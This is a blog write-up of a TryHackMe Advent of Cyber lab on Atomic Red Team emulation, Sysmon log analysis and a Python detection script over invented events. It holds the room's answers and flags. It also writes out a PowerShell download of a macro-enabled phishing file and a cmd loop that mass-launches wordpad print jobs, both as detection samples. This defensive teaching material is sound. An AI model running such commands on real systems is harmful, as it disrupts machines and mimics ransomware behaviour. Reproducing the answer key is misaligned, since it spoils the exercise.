TryHackMe

Advent of Cyber 2024 — Day 4: Atomic Red Team and MITRE ATT&CK Framework

Today’s challenge revolved around utilizing the Atomic Red Team framework to emulate adversarial techniques, analyzing system logs for Indicators of Compromise (IOCs), and creating detection rules to enhance threat detection capabilities.

Odiomonafe Jamal . A
4 min readDec 10, 2024

Key Learning Objectives

1. Understanding Detection Gaps

  • Detection gaps exist because adversaries keep changing their tradecraft and because malicious activity is often hard to tell apart from legitimate administration.
  • The goal is to detect an attack as early in the kill chain as possible, and in any case at some stage before the adversary reaches their objective.

2. Unified Cyber Kill Chain

  • The kill chain outlines the standard stages of an attack (the same stages apply to a malicious actor and to a red teamer), guiding blue teams to check that their detection coverage spans every stage rather than only the last one.

3. MITRE ATT&CK Framework

  • A public knowledge base of adversary tactics, techniques and sub-techniques observed in real intrusions, each with an ID (for example T1566.001). It is the shared vocabulary that lets emulated tests, log artefacts and detection rules be mapped to the same behaviour.

4. Atomic Red Team Framework

  • Simplifies testing for detection gaps with small, emulated adversarial techniques, each mapped to a MITRE ATT&CK technique ID.
  • Tests can be run automatically (through the Invoke-AtomicTest PowerShell cmdlet) or by hand; each one leaves artefacts such as process creations and files on disk that can then be analysed.

Practical Instance

1. Setup: Reviewed the test details with Invoke-AtomicTest T1566.001 -ShowDetails. The technique of interest was T1566.001 (Phishing: Spearphishing Attachment); the test simulates a user downloading a macro-enabled Office document delivered as a phishing attachment.

2. Prerequisite Check: Verified that the test's dependencies were in place with Invoke-AtomicTest T1566.001 -TestNumbers 1 -CheckPrereqs.

3. Test Execution: Ran the test (Invoke-AtomicTest T1566.001 -TestNumbers 1) to simulate downloading the phishing attachment (PhishingAttachment.xlsm).

4. Event Analysis: Cleared the Sysmon operational log (Microsoft-Windows-Sysmon/Operational) so that the test's own events stood out, then focused on two event types:

  • Process Creation (Sysmon Event ID 1): a PowerShell process whose command line ran the download.
  • File Creation (Sysmon Event ID 11): the creation of PhishingAttachment.xlsm on disk.

5. IOC Collection: Identified the indicators worth building a detection on:

  • A PowerShell command line containing Invoke-WebRequest together with the download URL and the output path of the attachment.
  • The downloaded file itself (PhishingAttachment.xlsm), including its path and the process that wrote it.

6. Cleanup: Removed all test artefacts and restored the environment with Invoke-AtomicTest T1566.001 -TestNumbers 1 -Cleanup.

Challenge

The task was to identify the Atomic test that exercises a command and scripting interpreter, run it, and extract the artefacts needed to craft a detection rule.

  1. What was the flag found in the .txt file that is found in the same directory as the PhishingAttachment.xlsm artefact? THM{GlitchTestingForSpearphishing}

2. What ATT&CK technique ID would be our point of interest? T1059

3. What ATT&CK subtechnique ID focuses on the Windows Command Shell? T1059.003

4. What is the name of the Atomic Test to be simulated? Simulate BlackByte Ransomware Print Bombing

5. What is the name of the file used in the test? Wareville_Ransomware.txt

6. What is the flag found from this Atomic Test? THM{R2xpdGNoIGlzIG5vdCB0aGUgZW5lbXk=}

  • The test had three phases. First, run the specific Atomic test under T1059.003 (Simulate BlackByte Ransomware Print Bombing), which uses a Windows Command Shell loop to launch wordpad.exe with the /p switch against the target file repeatedly, mimicking BlackByte's ransom-note print bombing.
  • Second, because the print jobs go to a PDF printer, each job asks where to save its output; save the PDF into a folder.
  • Third, navigate to that folder and open the saved PDF: it holds the printed contents of Wareville_Ransomware.txt, which is where the flag for question 6 is found.
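To turn the artefacts collected above (the Invoke-WebRequest download of PhishingAttachment.xlsm from the practical instance, and the burst of wordpad.exe /p launches from the print-bombing test) into detection logic, here is an added example in Python that is not part of the TryHackMe room, this write-up, or Atomic Red Team. It runs two rules over constructed Sysmon-style events (Event ID 1 process creation and Event ID 11 file creation). Every timestamp, PID, path and URL in the sample is invented, the thresholds and time windows are assumptions, and the events are plain dictionaries whose keys mirror Sysmon field names rather than exported event XML.

```python
"""Added example: two detection rules built from the Atomic test artefacts,
run over CONSTRUCTED Sysmon-style events (not real logs from the lab).
Keys follow Sysmon Event ID 1 (ProcessCreate: Image, CommandLine, ProcessId,
ParentImage, ParentProcessId) and Event ID 11 (FileCreate: Image, ProcessId,
TargetFilename). All paths, PIDs and times below are invented for the sample."""
import re
from collections import defaultdict
from datetime import datetime

MACRO_EXTS = (".xlsm", ".docm", ".pptm")  # macro-enabled Office formats
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
WORDPAD = r"C:\Program Files\Windows NT\Accessories\wordpad.exe"


def _proc(t, pid, ppid, image, parent, cmdline):
    return {"EventID": 1, "UtcTime": t, "ProcessId": pid, "ParentProcessId": ppid,
            "Image": image, "ParentImage": parent, "CommandLine": cmdline}


def _file(t, pid, image, target):
    return {"EventID": 11, "UtcTime": t, "ProcessId": pid, "Image": image,
            "TargetFilename": target}


# Constructed sample: the T1566.001 download, a benign spreadsheet save, and a
# burst of wordpad.exe /p launches like the T1059.003 print-bombing loop.
SAMPLE_EVENTS = [
    _proc("2024-12-04 10:00:01", 5120, 4001, PS, r"C:\Windows\explorer.exe",
          r'powershell.exe -c "Invoke-WebRequest -Uri http://example.invalid/PhishingAttachment.xlsm '
          r'-OutFile C:\Users\Administrator\Desktop\PhishingAttachment.xlsm"'),
    _file("2024-12-04 10:00:02", 5120, PS,
          r"C:\Users\Administrator\Desktop\PhishingAttachment.xlsm"),
    _file("2024-12-04 10:05:00", 6200,
          r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
          r"C:\Users\Administrator\Documents\budget.xlsx"),  # benign, no alert
    _proc("2024-12-04 10:10:00", 7000, 4001, CMD, r"C:\Windows\explorer.exe",
          r'cmd /c "for /l %x in (1,1,75) do start wordpad.exe /p C:\Tools\Wareville_Ransomware.txt"'),
] + [
    _proc(f"2024-12-04 10:10:{i:02d}", 7100 + i, 7000, WORDPAD, CMD,
          r'"C:\Program Files\Windows NT\Accessories\wordpad.exe" /p C:\Tools\Wareville_Ransomware.txt')
    for i in range(1, 13)  # 12 launches within 12 seconds from the same parent
] + [
    _proc("2024-12-04 11:00:00", 8000, 4001, WORDPAD, r"C:\Windows\explorer.exe",
          r'"C:\Program Files\Windows NT\Accessories\wordpad.exe" /p C:\Users\Administrator\notes.txt'),
    # a single interactive print job: must not trigger the burst rule
]


def _ts(e):
    return datetime.strptime(e["UtcTime"], "%Y-%m-%d %H:%M:%S")


def detect_macro_download(events, window_seconds=30):
    """Rule 1 (T1566.001 artefacts): PowerShell running Invoke-WebRequest that
    names a macro-enabled Office file, corroborated by a FileCreate (EID 11)
    from the same PID within window_seconds."""
    hits = []
    creates = [e for e in events if e["EventID"] == 11
               and e["TargetFilename"].lower().endswith(MACRO_EXTS)]
    for e in events:
        if e["EventID"] != 1 or not e["Image"].lower().endswith("powershell.exe"):
            continue
        cl = e["CommandLine"].lower()
        if "invoke-webrequest" not in cl or not any(x in cl for x in MACRO_EXTS):
            continue
        written = [c["TargetFilename"] for c in creates
                   if c["ProcessId"] == e["ProcessId"]
                   and 0 <= (_ts(c) - _ts(e)).total_seconds() <= window_seconds]
        hits.append({"rule": "T1566.001 macro-enabled attachment download",
                     "pid": e["ProcessId"], "commandline": e["CommandLine"],
                     "files_created": written})
    return hits


def detect_print_bombing(events, threshold=10, window_seconds=60):
    """Rule 2 (T1059.003 artefacts): a burst of wordpad.exe /p launches from one
    parent process, as produced by the BlackByte print-bombing loop. Counting
    by parent PID catches the behaviour even if the loop is not cmd.exe's."""
    by_parent = defaultdict(list)
    for e in events:
        if (e["EventID"] == 1 and e["Image"].lower().endswith("wordpad.exe")
                and re.search(r"\s/p\s", e["CommandLine"], re.I)):
            by_parent[e["ParentProcessId"]].append(e)
    parents = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    hits = []
    for ppid, launches in by_parent.items():
        launches.sort(key=_ts)
        for i, first in enumerate(launches):  # sliding window over launch times
            burst = [ev for ev in launches[i:]
                     if (_ts(ev) - _ts(first)).total_seconds() <= window_seconds]
            if len(burst) >= threshold:
                m = re.search(r"/p\s+(\S+)", first["CommandLine"], re.I)
                hits.append({"rule": "T1059.003 print bombing", "parent_pid": ppid,
                             "parent_commandline": parents.get(ppid, {}).get("CommandLine", ""),
                             "file_printed": m.group(1) if m else None,
                             "launches": len(burst)})
                break
    return hits


if __name__ == "__main__":
    for hit in detect_macro_download(SAMPLE_EVENTS) + detect_print_bombing(SAMPLE_EVENTS):
        print(hit)
```

Running the script prints one alert per rule. The print-bombing rule counts launches per parent PID instead of matching the literal `for /l` text, so it still fires when the loop is written in PowerShell or a batch file; the cmd.exe command line is attached to the alert only as supporting evidence, and the benign single print job is ignored.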

This exercise reinforced the importance of emulating adversarial techniques to uncover detection gaps, analyze IOCs, and craft effective detection rules for strengthening blue team defenses.
